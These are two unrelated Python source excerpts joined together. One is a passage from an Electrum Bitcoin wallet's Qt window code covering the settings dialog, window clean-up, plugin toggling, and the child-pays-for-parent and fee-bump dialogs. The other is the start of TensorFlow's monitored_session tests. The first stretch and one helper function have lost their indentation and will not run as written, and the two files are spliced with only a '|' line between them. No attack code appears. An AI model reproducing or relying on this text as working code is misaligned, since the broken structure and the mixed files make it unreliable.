ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.blockSignals(True)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
ex_combo.blockSignals(False)
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_model.refresh('on_history')
if self.fx.is_enabled() and checked:
self.fx.trigger_update()
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_model.refresh('on_history_capgains')
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('General')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.trigger_update()
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
    """Qt close handler: run window clean-up exactly once, then accept.

    This handler has been observed to fire twice in rare cases, so the
    cleaned_up flag makes the teardown idempotent.
    """
    first_close = not self.cleaned_up
    if first_close:
        self.cleaned_up = True
        self.clean_up()
    event.accept()
def clean_up(self):
    """Tear down window state before destruction.

    Stops the wallet thread, detaches network callbacks, persists window
    geometry and console history, closes the QR window, closes the wallet
    and finally unregisters this window from the gui object.
    """
    self.wallet.thread.stop()
    if self.network:
        # Stop receiving network / fx / history events for this window.
        self.network.unregister_callback(self.on_network)
        self.network.unregister_callback(self.on_quotes)
        self.network.unregister_callback(self.on_history)
    self.config.set_key("is_maximized", self.isMaximized())
    if not self.isMaximized():
        # Only remember an explicit geometry; a maximized window is
        # restored via the is_maximized flag instead.
        g = self.geometry()
        self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
                                              g.width(),g.height()])
    # Keep only the last 50 console entries to bound config size.
    self.config.set_key("console-history", self.console.history[-50:],
                        True)
    if self.qr_window:
        self.qr_window.close()
    self.close_wallet()
    # Detach the shared GUI timer before handing the window back.
    self.gui_object.timer.timeout.disconnect(self.timer_actions)
    self.gui_object.close_window(self)
def plugins_dialog(self):
    """Show a modal dialog listing plugins with enable/disable checkboxes.

    Each plugin row gets a checkbox, an optional per-plugin settings
    widget (only if the plugin requires settings), and a help button
    with its description.
    """
    self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
    plugins = self.gui_object.plugins
    vbox = QVBoxLayout(d)
    # plugins
    scroll = QScrollArea()
    scroll.setEnabled(True)
    scroll.setWidgetResizable(True)
    scroll.setMinimumSize(400,250)
    vbox.addWidget(scroll)
    w = QWidget()
    scroll.setWidget(w)
    w.setMinimumHeight(plugins.count() * 35)
    grid = QGridLayout()
    grid.setColumnStretch(0,1)
    w.setLayout(grid)
    settings_widgets = {}
    def enable_settings_widget(p, name, i):
        # Lazily create the settings widget the first time the plugin is
        # loaded; afterwards only toggle its enabled state.
        widget = settings_widgets.get(name)
        if not widget and p and p.requires_settings():
            widget = settings_widgets[name] = p.settings_widget(d)
            grid.addWidget(widget, i, 1)
        if widget:
            widget.setEnabled(bool(p and p.is_enabled()))
    def do_toggle(cb, name, i):
        # plugins.toggle() returns the plugin instance when enabled,
        # None when disabled.
        p = plugins.toggle(name)
        cb.setChecked(bool(p))
        enable_settings_widget(p, name, i)
        run_hook('init_qt', self.gui_object)
    for i, descr in enumerate(plugins.descriptions.values()):
        full_name = descr['__name__']
        prefix, _separator, name = full_name.rpartition('.')
        p = plugins.get(name)
        if descr.get('registers_keystore'):
            # Hardware/keystore plugins are managed elsewhere, not here.
            continue
        try:
            cb = QCheckBox(descr['fullname'])
            plugin_is_loaded = p is not None
            # Enabled when the plugin can be turned on (available) or
            # turned off (loaded and user-disableable).
            cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
                          or plugin_is_loaded and p.can_user_disable())
            cb.setEnabled(cb_enabled)
            cb.setChecked(plugin_is_loaded and p.is_enabled())
            grid.addWidget(cb, i, 0)
            enable_settings_widget(p, name, i)
            cb.clicked.connect(partial(do_toggle, cb, name, i))
            msg = descr['description']
            if descr.get('requires'):
                msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
            grid.addWidget(HelpButton(msg), i, 2)
        except Exception:
            # A broken plugin must not prevent the dialog from opening.
            self.logger.exception(f"cannot display plugin {name}")
    grid.setRowStretch(len(plugins.descriptions.values()), 1)
    vbox.addLayout(Buttons(CloseButton(d)))
    d.exec_()
def cpfp(self, parent_tx, new_tx):
    """Show the Child-Pays-For-Parent dialog and broadcast-prepare the child.

    Presumably parent_tx is an unconfirmed wallet transaction and new_tx
    a template spending one of its outputs back to the wallet; the user
    picks a child fee so the combined feerate bumps the parent.
    -- TODO confirm caller contract
    """
    total_size = parent_tx.estimated_size() + new_tx.estimated_size()
    parent_fee = self.wallet.get_tx_fee(parent_tx)
    if parent_fee is None:
        # Without the parent's fee we cannot compute a combined feerate.
        self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
        return
    d = WindowModalDialog(self, _('Child Pays for Parent'))
    vbox = QVBoxLayout(d)
    msg = (
        "A CPFP is a transaction that sends an unconfirmed output back to "
        "yourself, with a high fee. The goal is to have miners confirm "
        "the parent transaction in order to get the fee attached to the "
        "child transaction.")
    vbox.addWidget(WWLabel(_(msg)))
    msg2 = ("The proposed fee is computed using your "
            "fee/kB settings, applied to the total size of both child and "
            "parent transactions. After you broadcast a CPFP transaction, "
            "it is normal to see a new unconfirmed transaction in your history.")
    vbox.addWidget(WWLabel(_(msg2)))
    grid = QGridLayout()
    grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
    grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
    # The child can spend at most the full value of the output it consumes.
    max_fee = new_tx.output_value()
    grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
    grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
    output_amount = QLabel('')
    grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
    grid.addWidget(output_amount, 2, 1)
    fee_e = BTCAmountEdit(self.get_decimal_point)
    # FIXME with dyn fees, without estimates, there are all kinds of crashes here
    combined_fee = QLabel('')
    combined_feerate = QLabel('')
    def on_fee_edit(x):
        # Recompute the derived labels whenever the child fee changes.
        out_amt = max_fee - fee_e.get_amount()
        out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
        output_amount.setText(out_amt_str)
        comb_fee = parent_fee + fee_e.get_amount()
        comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
        combined_fee.setText(comb_fee_str)
        comb_feerate = comb_fee / total_size * 1000
        comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
        combined_feerate.setText(comb_feerate_str)
    fee_e.textChanged.connect(on_fee_edit)
    def get_child_fee_from_total_feerate(fee_per_kb):
        # Child fee = target combined fee minus what the parent already pays,
        # clamped to [total_size (1 sat/byte floor), max_fee].
        fee = fee_per_kb * total_size / 1000 - parent_fee
        fee = min(max_fee, fee)
        fee = max(total_size, fee)  # pay at least 1 sat/byte for combined size
        return fee
    suggested_feerate = self.config.fee_per_kb()
    if suggested_feerate is None:
        self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
        return
    fee = get_child_fee_from_total_feerate(suggested_feerate)
    fee_e.setAmount(fee)
    grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
    grid.addWidget(fee_e, 3, 1)
    def on_rate(dyn, pos, fee_rate):
        # Slider callback: derive the child fee from the chosen feerate.
        fee = get_child_fee_from_total_feerate(fee_rate)
        fee_e.setAmount(fee)
    fee_slider = FeeSlider(self, self.config, on_rate)
    fee_slider.update()
    grid.addWidget(fee_slider, 4, 1)
    grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
    grid.addWidget(combined_fee, 5, 1)
    grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
    grid.addWidget(combined_feerate, 6, 1)
    vbox.addLayout(grid)
    vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
    if not d.exec_():
        return
    fee = fee_e.get_amount()
    if fee > max_fee:
        self.show_error(_('Max fee exceeded'))
        return
    new_tx = self.wallet.cpfp(parent_tx, fee)
    # The child must itself be replaceable in case it needs bumping later.
    new_tx.set_rbf(True)
    self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
    """Let the user bump the fee of RBF transaction *tx*.

    Shows the current fee and asks for a new absolute fee (with a slider
    driven by dynamic fee estimates).  On confirmation builds the
    replacement via wallet.bump_fee() and opens it in the transaction
    dialog; a negative delta or an empty fee field is rejected.
    """
    fee = self.wallet.get_tx_fee(tx)
    if fee is None:
        self.show_error(_("Can't bump fee: unknown fee for original transaction."))
        return
    tx_label = self.wallet.get_label(tx.txid())
    tx_size = tx.estimated_size()
    d = WindowModalDialog(self, _('Bump Fee'))
    vbox = QVBoxLayout(d)
    vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
    vbox.addWidget(QLabel(_('Current fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
    # Translate only the phrase; the colon is appended outside _() so the
    # translation key matches the pattern used by every other label here.
    vbox.addWidget(QLabel(_('New fee') + ':'))
    fee_e = BTCAmountEdit(self.get_decimal_point)
    # Amounts are integer satoshis; suggest 1.5x the old fee as a start.
    fee_e.setAmount(int(fee * 1.5))
    vbox.addWidget(fee_e)
    def on_rate(dyn, pos, fee_rate):
        # Slider callback: absolute fee from feerate (sat/kB) and tx size.
        fee = int(fee_rate * tx_size / 1000)
        fee_e.setAmount(fee)
    fee_slider = FeeSlider(self, self.config, on_rate)
    vbox.addWidget(fee_slider)
    cb = QCheckBox(_('Final'))
    vbox.addWidget(cb)
    vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
    if not d.exec_():
        return
    is_final = cb.isChecked()
    new_fee = fee_e.get_amount()
    if new_fee is None:
        # Empty/unparseable fee field: avoid TypeError on the subtraction.
        self.show_error(_('Invalid amount'))
        return
    delta = new_fee - fee
    if delta < 0:
        self.show_error("fee too low")
        return
    try:
        new_tx = self.wallet.bump_fee(tx, delta)
    except CannotBumpFee as e:
        self.show_error(str(e))
        return
    if is_final:
        # "Final" disables RBF on the replacement.
        new_tx.set_rbf(False)
    self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
    """Add (offline) transaction *tx* to the wallet history.

    Returns True on success; False if the wallet refuses the transaction
    or it conflicts with the existing history.  Errors are reported on
    the top-level window so they appear above any open dialog.
    """
    win = self.top_level_window()
    try:
        if not self.wallet.add_transaction(tx.txid(), tx):
            win.show_error(_("Transaction could not be saved.") + "\n" +
                           _("It conflicts with current history."))
            return False
    except AddTransactionException as e:
        win.show_error(e)
        return False
    else:
        # Persist immediately so the transaction survives a crash.
        self.wallet.storage.write()
        # need to update at least: history_list, utxo_list, address_list
        self.need_update.set()
        msg = (_("Transaction added to wallet history.") + '\n\n' +
               _("Note: this is an offline transaction, if you want the network "
                 "to see it, you need to broadcast it."))
        win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
        return True
|
monitored_session_test.py | # pylint: disable=g-bad-file-header
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for monitored_session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import glob
import os
import threading
import time
from tensorflow.contrib.framework.python.ops import variables as variables_lib
from tensorflow.contrib.testing.python.framework import util_test
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import debug_pb2
from tensorflow.python.client import session as session_lib
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.summary import summary
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import coordinator
from tensorflow.python.training import monitored_session
from tensorflow.python.training import saver as saver_lib
from tensorflow.python.training import session_run_hook
class ScaffoldTest(test.TestCase):
  """Scaffold tests."""

  def test_nothing_created_before_finalize(self):
    # A fresh Scaffold is inert: all op/saver slots stay None until finalize().
    with ops.Graph().as_default():
      scaffold = monitored_session.Scaffold()
      self.assertEqual(None, scaffold.init_op)
      self.assertEqual(None, scaffold.init_feed_dict)
      self.assertEqual(None, scaffold.init_fn)
      self.assertEqual(None, scaffold.ready_op)
      self.assertEqual(None, scaffold.ready_for_local_init_op)
      self.assertEqual(None, scaffold.local_init_op)
      self.assertEqual(None, scaffold.saver)

  def test_defaults_empty_graph(self):
    # finalize() builds default ops from the graph's global/local variables.
    with ops.Graph().as_default():
      scaffold = monitored_session.Scaffold()
      variables.Variable(1, name='my_var')
      variables.Variable(
          2, name='my_local_var', collections=[ops.GraphKeys.LOCAL_VARIABLES])
      scaffold.finalize()
      self.assertTrue(isinstance(scaffold.init_op, ops.Operation))
      self.assertEqual(None, scaffold.init_feed_dict)
      self.assertEqual(None, scaffold.init_fn)
      self.assertTrue(isinstance(scaffold.ready_op, ops.Tensor))
      self.assertTrue(isinstance(scaffold.ready_for_local_init_op, ops.Tensor))
      self.assertTrue(isinstance(scaffold.local_init_op, ops.Operation))
      self.assertTrue(isinstance(scaffold.saver, saver_lib.Saver))
      with self.test_session() as sess:
        # ready_op yields the names of uninitialized variables; they drop
        # out as init_op and then local_init_op run.
        self.assertItemsEqual([b'my_var', b'my_local_var'],
                              sess.run(scaffold.ready_op))
        self.assertItemsEqual([b'my_var'],
                              sess.run(scaffold.ready_for_local_init_op))
        sess.run(scaffold.init_op)
        self.assertEqual(0, len(sess.run(scaffold.ready_for_local_init_op)))
        sess.run(scaffold.local_init_op)
        self.assertEqual(0, len(sess.run(scaffold.ready_op)))

  def test_defaults_no_variables(self):
    # Defaults are still created for a graph with no variables at all.
    with ops.Graph().as_default():
      scaffold = monitored_session.Scaffold()
      constant_op.constant(1, name='my_const')
      scaffold.finalize()
      self.assertTrue(isinstance(scaffold.init_op, ops.Operation))
      self.assertEqual(None, scaffold.init_feed_dict)
      self.assertEqual(None, scaffold.init_fn)
      self.assertTrue(isinstance(scaffold.ready_op, ops.Tensor))
      self.assertTrue(isinstance(scaffold.ready_for_local_init_op, ops.Tensor))
      self.assertTrue(isinstance(scaffold.local_init_op, ops.Operation))
      self.assertTrue(isinstance(scaffold.saver, saver_lib.Saver))

  def test_caches_values(self):
    # Two scaffolds finalized on the same graph share the cached defaults.
    with ops.Graph().as_default():
      variables.Variable([1])
      scaffold1 = monitored_session.Scaffold()
      scaffold1.finalize()
      scaffold2 = monitored_session.Scaffold()
      scaffold2.finalize()
      self.assertEqual(scaffold1.init_op, scaffold2.init_op)
      self.assertEqual(scaffold1.ready_op, scaffold2.ready_op)
      self.assertEqual(scaffold1.ready_for_local_init_op,
                       scaffold2.ready_for_local_init_op)
      self.assertEqual(scaffold1.local_init_op, scaffold2.local_init_op)
      self.assertEqual(scaffold1.saver, scaffold2.saver)

  def test_raise_error_if_more_than_one_cached_item(self):
    # Two savers in the SAVERS collection is ambiguous and must fail.
    with ops.Graph().as_default():
      variables.Variable([1])
      ops.add_to_collection(ops.GraphKeys.SAVERS, saver_lib.Saver())
      ops.add_to_collection(ops.GraphKeys.SAVERS, saver_lib.Saver())
      with self.assertRaisesRegexp(RuntimeError, 'More than one item'):
        monitored_session.Scaffold().finalize()

  def test_uses_passed_values(self):
    # Explicitly passed pieces are kept verbatim by finalize().
    with ops.Graph().as_default():
      variables.Variable([1])
      saver = saver_lib.Saver()
      scaffold = monitored_session.Scaffold(
          init_op=2,
          init_feed_dict=3,
          init_fn=lambda scaffold, sess: 4,
          ready_op=5,
          ready_for_local_init_op=6,
          local_init_op=7,
          saver=saver)
      scaffold.finalize()
      self.assertEqual(2, scaffold.init_op)
      self.assertEqual(3, scaffold.init_feed_dict)
      self.assertTrue(callable(scaffold.init_fn))
      self.assertEqual(5, scaffold.ready_op)
      self.assertEqual(6, scaffold.ready_for_local_init_op)
      self.assertEqual(7, scaffold.local_init_op)
      self.assertEqual(saver, scaffold.saver)

  def test_graph_is_finalized(self):
    # finalize() freezes the graph: further op creation raises.
    with ops.Graph().as_default():
      variables.Variable([1])
      monitored_session.Scaffold().finalize()
      with self.assertRaisesRegexp(RuntimeError,
                                   'Graph is finalized and cannot be modified'):
        constant_op.constant([0])
def _test_dir(temp_dir, test_name):
"""Create an empty dir to use for tests.
Args:
temp_dir: Tmp directory path.
test_name: Name of the test.
Returns:
Absolute path to the test directory.
"""
test_dir = os.path.join(temp_dir, test_name)
if os.path.isdir(test_dir):
for f in glob.glob('%s/*' % test_dir):
os.remove(f)
else:
os.makedirs(test_dir)
return test_dir
class FakeHook(session_run_hook.SessionRunHook):
  """SessionRunHook that records every callback for later inspection.

  Tests configure `request` / `should_stop`, then assert on
  `call_counter`, `last_run_context` and `last_run_values`.
  """

  def __init__(self):
    self.should_stop = False  # when True, after_run() requests a stop
    self.request = None  # value returned verbatim from before_run()
    self.call_counter = collections.Counter()  # callback name -> #calls
    self.last_run_context = None
    self.last_run_values = None

  def begin(self):
    self.call_counter['begin'] += 1

  def after_create_session(self, session, coord):  # pylint: disable=unused-argument
    self.call_counter['after_create_session'] += 1

  def before_run(self, run_context):
    self.call_counter['before_run'] += 1
    self.last_run_context = run_context
    return self.request

  def after_run(self, run_context, run_values):
    self.call_counter['after_run'] += 1
    self.last_run_values = run_values
    if self.should_stop:
      run_context.request_stop()

  def end(self, session):
    self.call_counter['end'] += 1
class MonitoredTrainingSessionTest(test.TestCase):
  """Tests MonitoredTrainingSession."""

  def test_saving_restoring_checkpoint(self):
    logdir = _test_dir(self.get_temp_dir(), 'test_saving_restoring_checkpoint')
    with ops.Graph().as_default():
      gstep = variables_lib.get_or_create_global_step()
      do_step = state_ops.assign_add(gstep, 1)
      with monitored_session.MonitoredTrainingSession(
          is_chief=True, checkpoint_dir=logdir) as session:
        self.assertEqual(0, session.run(gstep))
        self.assertEqual(1, session.run(do_step))
        self.assertEqual(2, session.run(do_step))
      # A restart will find the checkpoint and recover automatically.
      with monitored_session.MonitoredTrainingSession(
          is_chief=True, checkpoint_dir=logdir) as session:
        self.assertEqual(2, session.run(gstep))

  def test_summaries_steps(self):
    logdir = _test_dir(self.get_temp_dir(), 'test_summaries_steps')
    with ops.Graph().as_default():
      gstep = variables_lib.get_or_create_global_step()
      new_gstep = state_ops.assign_add(gstep, 1)
      summary.scalar('my_summary_tag', new_gstep * 2)
      with monitored_session.MonitoredTrainingSession(
          is_chief=True,
          checkpoint_dir=logdir,
          save_summaries_steps=100,
          log_step_count_steps=10) as session:
        # 101 steps crosses the 100-step summary interval.
        for _ in range(101):
          session.run(new_gstep)
      summaries = util_test.latest_summaries(logdir)
      tags = [s.summary.value[0].tag for s in summaries]
      self.assertIn('my_summary_tag', tags)
      self.assertIn('global_step/sec', tags)

  def test_summaries_secs(self):
    logdir = _test_dir(self.get_temp_dir(), 'test_summaries_secs')
    with ops.Graph().as_default():
      gstep = variables_lib.get_or_create_global_step()
      new_gstep = state_ops.assign_add(gstep, 1)
      summary.scalar('my_summary_tag', new_gstep * 2)
      with monitored_session.MonitoredTrainingSession(
          is_chief=True,
          checkpoint_dir=logdir,
          save_summaries_steps=None,
          save_summaries_secs=0.1,
          log_step_count_steps=10) as session:
        session.run(new_gstep)
        # Let the 0.1s summary interval elapse before running more steps.
        time.sleep(0.2)
        for _ in range(101):
          session.run(new_gstep)
      summaries = util_test.latest_summaries(logdir)
      tags = [s.summary.value[0].tag for s in summaries]
      self.assertIn('my_summary_tag', tags)
      self.assertIn('global_step/sec', tags)

  def test_custom_saving(self):
    logdir = _test_dir(self.get_temp_dir(), 'test_saving_restoring_checkpoint')
    fake_hook = FakeHook()
    with ops.Graph().as_default():
      gstep = variables_lib.get_or_create_global_step()
      do_step = state_ops.assign_add(gstep, 1)
      with monitored_session.MonitoredTrainingSession(
          is_chief=True,
          checkpoint_dir=logdir,
          chief_only_hooks=[fake_hook],
          save_checkpoint_secs=0) as session:
        self.assertEqual(0, session.run(gstep))
        self.assertEqual(1, session.run(do_step))
        self.assertEqual(2, session.run(do_step))
      # Check whether custom hook called or not
      self.assertEqual(1, fake_hook.call_counter['begin'])
      # A restart will not find the checkpoint, since we didn't save.
      with monitored_session.MonitoredTrainingSession(
          is_chief=True, checkpoint_dir=logdir) as session:
        self.assertEqual(0, session.run(gstep))
class StopAtNSession(monitored_session._WrappedSession):
  """A wrapped session that stops at the N-th call to _check_stop."""

  def __init__(self, sess, n):
    super(StopAtNSession, self).__init__(sess)
    self._count = n  # remaining _check_stop() calls that return False

  def _check_stop(self):
    # Returns False n times, then True on every call thereafter.
    if self._count == 0:
      return True
    self._count -= 1
    return False
class WrappedSessionTest(test.TestCase):
  """_WrappedSession tests."""

  def test_properties(self):
    # graph and sess_str are delegated to the wrapped session.
    with self.test_session() as sess:
      constant_op.constant(0.0)
      wrapped_sess = monitored_session._WrappedSession(sess)
      self.assertEquals(sess.graph, wrapped_sess.graph)
      self.assertEquals(sess.sess_str, wrapped_sess.sess_str)

  def test_should_stop_on_close(self):
    with self.test_session() as sess:
      wrapped_sess = monitored_session._WrappedSession(sess)
      self.assertFalse(wrapped_sess.should_stop())
      wrapped_sess.close()
      self.assertTrue(wrapped_sess.should_stop())

  def test_should_stop_uses_check_stop(self):
    # should_stop() defers to the subclass's _check_stop() hook.
    with self.test_session() as sess:
      wrapped_sess = StopAtNSession(sess, 3)
      self.assertFalse(wrapped_sess.should_stop())
      self.assertFalse(wrapped_sess.should_stop())
      self.assertFalse(wrapped_sess.should_stop())
      self.assertTrue(wrapped_sess.should_stop())

  def test_should_stop_delegates_to_wrapped_session(self):
    # Nested wrappers propagate should_stop() down to the innermost one.
    with self.test_session() as sess:
      wrapped_sess0 = StopAtNSession(sess, 4)
      wrapped_sess1 = monitored_session._WrappedSession(wrapped_sess0)
      self.assertFalse(wrapped_sess1.should_stop())
      self.assertFalse(wrapped_sess1.should_stop())
      self.assertFalse(wrapped_sess1.should_stop())
      self.assertFalse(wrapped_sess1.should_stop())
      self.assertTrue(wrapped_sess1.should_stop())

  def test_close_twice(self):
    # Closing twice must be harmless (idempotent close).
    with self.test_session() as sess:
      wrapped_sess = monitored_session._WrappedSession(sess)
      wrapped_sess.close()
      self.assertTrue(wrapped_sess.should_stop())
      wrapped_sess.close()
      self.assertTrue(wrapped_sess.should_stop())

  def test_run(self):
    with self.test_session() as sess:
      c = constant_op.constant(0)
      v = array_ops.identity(c)
      self.assertEqual(42, sess.run(v, feed_dict={c: 42}))
      wrapped_sess = monitored_session._WrappedSession(sess)
      self.assertEqual(51, wrapped_sess.run(v, feed_dict={c: 51}))
def busy_wait_for_coord_stop(coord):
  """Spin (with a tiny sleep) until `coord` reports it should stop."""
  stopped = coord.should_stop
  while not stopped():
    time.sleep(0.001)
class CoordinatedSessionTest(test.TestCase):
  """_CoordinatedSession tests."""

  def test_properties(self):
    # graph and sess_str are delegated to the wrapped session.
    with self.test_session() as sess:
      constant_op.constant(0.0)
      coord = coordinator.Coordinator()
      coord_sess = monitored_session._CoordinatedSession(sess, coord)
      self.assertEquals(sess.graph, coord_sess.graph)
      self.assertEquals(sess.sess_str, coord_sess.sess_str)

  def test_run(self):
    with self.test_session() as sess:
      c = constant_op.constant(0)
      v = array_ops.identity(c)
      coord = coordinator.Coordinator()
      coord_sess = monitored_session._CoordinatedSession(sess, coord)
      self.assertEqual(42, coord_sess.run(v, feed_dict={c: 42}))

  def test_should_stop_on_close(self):
    with self.test_session() as sess:
      coord = coordinator.Coordinator()
      coord_sess = monitored_session._CoordinatedSession(sess, coord)
      self.assertFalse(coord_sess.should_stop())
      coord_sess.close()
      self.assertTrue(coord_sess.should_stop())

  def test_should_stop_on_coord_stop(self):
    # Stopping the coordinator alone is enough to flag the session stopped.
    with self.test_session() as sess:
      coord = coordinator.Coordinator()
      coord_sess = monitored_session._CoordinatedSession(sess, coord)
      self.assertFalse(coord_sess.should_stop())
      coord.request_stop()
      self.assertTrue(coord_sess.should_stop())

  def test_dont_request_stop_on_exception_in_main_thread(self):
    # An exception raised by run() in the main thread must NOT stop the
    # coordinator; it propagates to the caller instead.
    with self.test_session() as sess:
      c = constant_op.constant(0)
      v = array_ops.identity(c)
      coord = coordinator.Coordinator()
      coord_sess = monitored_session._CoordinatedSession(sess, coord)
      self.assertFalse(coord_sess.should_stop())
      self.assertEqual(0, coord_sess.run(c))
      self.assertEqual(1, coord_sess.run(v, feed_dict={c: 1}))
      with self.assertRaisesRegexp(TypeError, 'None has invalid type'):
        coord_sess.run([None], feed_dict={c: 2})
      self.assertFalse(coord.should_stop())
      self.assertFalse(coord_sess.should_stop())

  def test_stop_threads_on_close_after_exception(self):
    with self.test_session() as sess:
      c = constant_op.constant(0)
      v = array_ops.identity(c)
      coord = coordinator.Coordinator()
      threads = [
          threading.Thread(
              target=busy_wait_for_coord_stop, args=(coord,)) for _ in range(3)
      ]
      for t in threads:
        coord.register_thread(t)
        t.start()
      coord_sess = monitored_session._CoordinatedSession(sess, coord)
      self.assertFalse(coord_sess.should_stop())
      for t in threads:
        self.assertTrue(t.is_alive())
      self.assertEqual(0, coord_sess.run(c))
      for t in threads:
        self.assertTrue(t.is_alive())
      self.assertEqual(1, coord_sess.run(v, feed_dict={c: 1}))
      for t in threads:
        self.assertTrue(t.is_alive())
      with self.assertRaisesRegexp(TypeError, 'None has invalid type'):
        coord_sess.run([None], feed_dict={c: 2})
      # close() stops the coordinator, which joins the registered threads.
      coord_sess.close()
      for t in threads:
        self.assertFalse(t.is_alive())
      self.assertTrue(coord.should_stop())
      self.assertTrue(coord_sess.should_stop())

  def test_stop_threads_on_close(self):
    with self.test_session() as sess:
      coord = coordinator.Coordinator()
      threads = [
          threading.Thread(
              target=busy_wait_for_coord_stop, args=(coord,)) for _ in range(3)
      ]
      for t in threads:
        coord.register_thread(t)
        t.start()
      coord_sess = monitored_session._CoordinatedSession(sess, coord)
      coord_sess.close()
      for t in threads:
        self.assertFalse(t.is_alive())
      self.assertTrue(coord.should_stop())
      self.assertTrue(coord_sess.should_stop())
class AbortAtNSession(object):
  """A mock session that aborts at the N-th run call."""

  def __init__(self, sess, n):
    self._sess = sess
    self._count = n  # remaining run() calls before the session "aborts"

  def close(self):
    pass

  def run(self, *args, **kwargs):
    # Raise AbortedError once the budget is exhausted, simulating a
    # session failure that _RecoverableSession is expected to survive.
    if self._count == 0:
      raise errors_impl.AbortedError('Aborted at N', None, None)
    self._count -= 1
